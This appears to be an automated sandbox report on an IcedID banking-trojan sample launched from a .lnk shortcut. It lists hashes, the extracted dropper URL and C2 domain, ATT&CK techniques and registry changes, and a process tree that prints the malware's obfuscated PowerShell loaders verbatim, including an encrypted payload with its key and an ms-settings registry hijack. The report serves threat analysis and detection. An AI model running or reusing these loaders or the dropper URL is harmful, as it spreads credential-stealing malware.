icedid | 4b582f38e3376346cb066e36ff8dfa32b268154bb2de13870702e8bbf366a023

General

Target

54267-876-8676.lnk
Size

2KB
MD5

9edabe11d846a6de5d337e737d24e85c
SHA1

26f63aac40c4e9f459a379eec94a258b604f582e
SHA256

4b582f38e3376346cb066e36ff8dfa32b268154bb2de13870702e8bbf366a023
SHA512

5e88d418cb26f4bfd7bf5d1b2dbf31a8f026bbf29c760919d2986c883de6067df75c5eb8ca790a2c4a7ef09b87a2c6ba1b62e57e76fc3b32af633317639c6f0e

Score

10^/10

icedid 109932505 banker loader persistence suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://modhub.com.br/upload.hta

Extracted

Family

icedid

Campaign

109932505

C2

ilekvoyn.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata
Blocklisted process makes network request 7 IoCs

Processes:

mshta.exepowershell.exeRundll32.exe

flow pid process

5 5012 mshta.exe
6 5012 mshta.exe
8 5012 mshta.exe
10 5012 mshta.exe
12 1264 powershell.exe
13 1264 powershell.exe
70 3252 Rundll32.exe
Downloads MZ/PE file

flow	pid	process
5	5012	mshta.exe
6	5012	mshta.exe
8	5012	mshta.exe
10	5012	mshta.exe
12	1264	powershell.exe
13	1264	powershell.exe
70	3252	Rundll32.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 1 IoCs

Processes:

Rundll32.exe

pid process

3252 Rundll32.exe

pid	process
3252	Rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7b1931ba-c4f4-4fa7-9e4f-6f6adc2af7ab.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220524122518.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 11 IoCs

Processes:

powershell.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command	powershell.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lxpwR.bat"	powershell.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exepowershell.exemsedge.exemsedge.exepowershell.exeidentity_helper.exeRundll32.exemsedge.exe

pid	process
4300	powershell.exe
4300	powershell.exe
1264	powershell.exe
1264	powershell.exe
3684	msedge.exe
3684	msedge.exe
1544	msedge.exe
1544	msedge.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
2996	identity_helper.exe
2996	identity_helper.exe
3252	Rundll32.exe
3252	Rundll32.exe
5108	msedge.exe
5108	msedge.exe
5108	msedge.exe
5108	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

1544 msedge.exe
1544 msedge.exe
1544 msedge.exe
1544 msedge.exe

pid	process
1544	msedge.exe
1544	msedge.exe
1544	msedge.exe
1544	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeIncreaseQuotaPrivilege	3200	powershell.exe
Token: SeSecurityPrivilege	3200	powershell.exe
Token: SeTakeOwnershipPrivilege	3200	powershell.exe
Token: SeLoadDriverPrivilege	3200	powershell.exe
Token: SeSystemProfilePrivilege	3200	powershell.exe
Token: SeSystemtimePrivilege	3200	powershell.exe
Token: SeProfSingleProcessPrivilege	3200	powershell.exe
Token: SeIncBasePriorityPrivilege	3200	powershell.exe
Token: SeCreatePagefilePrivilege	3200	powershell.exe
Token: SeBackupPrivilege	3200	powershell.exe
Token: SeRestorePrivilege	3200	powershell.exe
Token: SeShutdownPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeSystemEnvironmentPrivilege	3200	powershell.exe
Token: SeRemoteShutdownPrivilege	3200	powershell.exe
Token: SeUndockPrivilege	3200	powershell.exe
Token: SeManageVolumePrivilege	3200	powershell.exe
Token: 33	3200	powershell.exe
Token: 34	3200	powershell.exe
Token: 35	3200	powershell.exe
Token: 36	3200	powershell.exe
Token: SeIncreaseQuotaPrivilege	3200	powershell.exe
Token: SeSecurityPrivilege	3200	powershell.exe
Token: SeTakeOwnershipPrivilege	3200	powershell.exe
Token: SeLoadDriverPrivilege	3200	powershell.exe
Token: SeSystemProfilePrivilege	3200	powershell.exe
Token: SeSystemtimePrivilege	3200	powershell.exe
Token: SeProfSingleProcessPrivilege	3200	powershell.exe
Token: SeIncBasePriorityPrivilege	3200	powershell.exe
Token: SeCreatePagefilePrivilege	3200	powershell.exe
Token: SeBackupPrivilege	3200	powershell.exe
Token: SeRestorePrivilege	3200	powershell.exe
Token: SeShutdownPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeSystemEnvironmentPrivilege	3200	powershell.exe
Token: SeRemoteShutdownPrivilege	3200	powershell.exe
Token: SeUndockPrivilege	3200	powershell.exe
Token: SeManageVolumePrivilege	3200	powershell.exe
Token: 33	3200	powershell.exe
Token: 34	3200	powershell.exe
Token: 35	3200	powershell.exe
Token: 36	3200	powershell.exe
Token: SeIncreaseQuotaPrivilege	3200	powershell.exe
Token: SeSecurityPrivilege	3200	powershell.exe
Token: SeTakeOwnershipPrivilege	3200	powershell.exe
Token: SeLoadDriverPrivilege	3200	powershell.exe
Token: SeSystemProfilePrivilege	3200	powershell.exe
Token: SeSystemtimePrivilege	3200	powershell.exe
Token: SeProfSingleProcessPrivilege	3200	powershell.exe
Token: SeIncBasePriorityPrivilege	3200	powershell.exe
Token: SeCreatePagefilePrivilege	3200	powershell.exe
Token: SeBackupPrivilege	3200	powershell.exe
Token: SeRestorePrivilege	3200	powershell.exe
Token: SeShutdownPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeSystemEnvironmentPrivilege	3200	powershell.exe
Token: SeRemoteShutdownPrivilege	3200	powershell.exe
Token: SeUndockPrivilege	3200	powershell.exe
Token: SeManageVolumePrivilege	3200	powershell.exe
Token: 33	3200	powershell.exe
Token: 34	3200	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exeRundll32.exe

pid process

1544 msedge.exe
1544 msedge.exe
3252 Rundll32.exe

pid	process
1544	msedge.exe
1544	msedge.exe
3252	Rundll32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exemshta.exepowershell.exemsedge.exe

description	pid	process	target process
PID 4476 wrote to memory of 4300	4476	cmd.exe	powershell.exe
PID 4476 wrote to memory of 4300	4476	cmd.exe	powershell.exe
PID 4300 wrote to memory of 5012	4300	powershell.exe	mshta.exe
PID 4300 wrote to memory of 5012	4300	powershell.exe	mshta.exe
PID 5012 wrote to memory of 1264	5012	mshta.exe	powershell.exe
PID 5012 wrote to memory of 1264	5012	mshta.exe	powershell.exe
PID 1264 wrote to memory of 1544	1264	powershell.exe	msedge.exe
PID 1264 wrote to memory of 1544	1264	powershell.exe	msedge.exe
PID 1544 wrote to memory of 1452	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 1452	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3792	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3684	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 3684	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe
PID 1544 wrote to memory of 4432	1544	msedge.exe	msedge.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\54267-876-8676.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#~@+uvOSgQ:Z#>$tEIiiZsclbDp=@(96580,96586,96575,96587,96568,96503,96575,96587,96587,96583,96586,96529,96518,96518,96580,96582,96571,96575,96588,96569,96517,96570,96582,96580,96517,96569,96585,96518,96588,96583,96579,96582,96568,96571,96517,96575,96587,96568);<#~@+uvOSgQ:Z#>$IMvbvbxLdUneQIhgXc=@(96544,96540,96559);<#~@+uvOSgQ:Z#>function xqvxwsJeK($LmLHgHafCwGhrN){$iSqvUTYMYOTHbW=96471;<#~@+uvOSgQ:Z#>$izdBrBghcDulg=$Null;foreach($eEFlcMD in $LmLHgHafCwGhrN){$izdBrBghcDulg+=[char]($eEFlcMD-$iSqvUTYMYOTHbW)};return $izdBrBghcDulg};sal UJNjnKJgNJogU (xqvxwsJeK $IMvbvbxLdUneQIhgXc);<#~@+uvOSgQ:Z#>UJNjnKJgNJogU((xqvxwsJeK $tEIiiZsclbDp));
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4300

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://modhub.com.br/upload.hta
3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $UGJgEhmuQd = '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';$WKVNMcNuTUpXE = 'bUlYbmdVTkJkVnNvWVJVeXFwcHBVeHJuanZpeVFGYlY=';$oFbHgtfJ = New-Object 'System.Security.Cryptography.AesManaged';$oFbHgtfJ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$oFbHgtfJ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$oFbHgtfJ.BlockSize = 128;$oFbHgtfJ.KeySize = 256;$oFbHgtfJ.Key = [System.Convert]::FromBase64String($WKVNMcNuTUpXE);$gCoYl = [System.Convert]::FromBase64String($UGJgEhmuQd);$ICVweoIsktHXuPbT = $gCoYl[0..15];$oFbHgtfJ.IV = $ICVweoIsktHXuPbT;$ISrVZKmzx = $oFbHgtfJ.CreateDecryptor();$BVbcZFBkTOHzRio = $ISrVZKmzx.TransformFinalBlock($gCoYl, 16, $gCoYl.Length - 16);$oFbHgtfJ.Dispose();$yPWz = New-Object System.IO.MemoryStream( , $BVbcZFBkTOHzRio );$cSgQKoGnaBTUr = New-Object System.IO.MemoryStream;$FBjahzKZdIyOBKk = New-Object System.IO.Compression.GzipStream $yPWz, ([IO.Compression.CompressionMode]::Decompress);$FBjahzKZdIyOBKk.CopyTo( $cSgQKoGnaBTUr );$FBjahzKZdIyOBKk.Close();$yPWz.Close();[byte[]] $kDPXaLSxrvyUbr = $cSgQKoGnaBTUr.ToArray();$zZiPscSF = [System.Text.Encoding]::UTF8.GetString($kDPXaLSxrvyUbr);Invoke-Expression($zZiPscSF)
4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\DeepL_Logo_darkBlue_v2.svg
5⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffa063d46f8,0x7ffa063d4708,0x7ffa063d4718
6⤵
PID:1452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
6⤵
PID:3792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
6⤵
PID:4432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
6⤵
PID:4772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
6⤵
PID:4776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5520 /prefetch:8
6⤵
PID:1312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
6⤵
PID:3968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
6⤵
PID:1020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4028 /prefetch:8
6⤵
PID:3216

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:8
6⤵
PID:4676

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
6⤵
- Drops file in Program Files directory
PID:4516

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x7ff797c35460,0x7ff797c35470,0x7ff797c35480
7⤵
PID:1888

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:8
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:2996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:8
6⤵
PID:4440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,9690871643540334329,12367668011128891969,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:8
6⤵
PID:1324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
